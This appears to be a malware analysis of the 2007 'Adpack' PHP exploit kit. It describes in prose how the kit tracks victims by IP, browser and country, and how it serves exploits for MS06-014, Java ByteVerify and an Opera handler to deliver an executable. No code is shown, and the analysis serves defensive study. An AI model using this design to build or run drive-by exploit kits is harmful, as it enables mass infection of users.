Adpack stands for "Advanced Pack" and was written in PHP on the server side along with SQL backend for tracking and statistics.
Analysis was performed on a toolkit which had file timestamps of September 2007.
The pack attempts to exploit the following vulnerabilities:
- MS06-014 (MDAC)
- Java ByteVerify
- Opera 9 (?)
URLs as seen by the victim:
"index.php?java" - returns HTML page to load Java applet.
"java.php" - returns a JAR archive for the Java exploit.
"load.php" - returns an Executable file (default: "load.exe").
Details on server side execution of PHP:
Inserts victim's IP address into the database under the compormised table ("ips2").
If unable to INSERT then returns plain text string: "ai siktir vee?".
Increment the "loads" count.
Return an executable file ("load.exe") with MIME type: "application/octet-stream".
Check if configured to serve the Java exploit and URL parameter contains a request for it, and
IP address already visited this script (to get the redirect), and IP address has not been exploited,
only then serve the <applet> tag.
Insert IP address into the database under visitors table ("ips"). If IP address already exists the update will fail.
Failure to INSERT will abort the script and return the same string as for "load.php".
Increment statistical counts for Browser, Operating System, and Country.
The following browser strings are tracked:
"MSIE 7", "MSIE", "Nav", "Lynx", "Bot", "Firefox", "Mozilla".
Following is a list of Operating System strings which is tracked:
"Windows 95", "Windows NT 4", "Win 9x 4.9", "Windows 98", "Windows NT 5.0", "Linux",
"SV1" (as WinXPsp2), "Windows NT 5.1", "Windows NT 5.2", "FreeBSD", "Gentoo", "Ubuntu"
Uses the GeoIP library to identify visitor's country.
Stores the Referer's FQDN field and increments its count.
By default URL resides in the same directory as the "index.php" script and will be called
If Java exploit was requested then serve the HTML applet tag with JAR archive as "java.php",
class to run "BaaaaBaa.class" and a single parameter "url" with value of the URL for the Executable.
OR, if browser is "MSIE" then return the obfuscated HTML page.
HEAD will contain a 3 second redirection timeout to the Java exploit URL ("index.php?java").
OR, if browser is "Opera" serve an Opera exploit which will reconfigure a preference for the
TN3270 handler to execute the downloaded Executable file.
Connects to the database as defined in "config.php".
Contains definitions for various functions which are used by the toolkit.
:) - contains a blind SQL Injection vulnerability.
Creates the necessary tables in the database. If tables already exists they will be dropped.
Contains the Database configuration and credentials, pack's admin credentials, name of the Executable file.
Boolean toggle for Java exploit.
Admin page which displays various statistics and allows to reset statistics.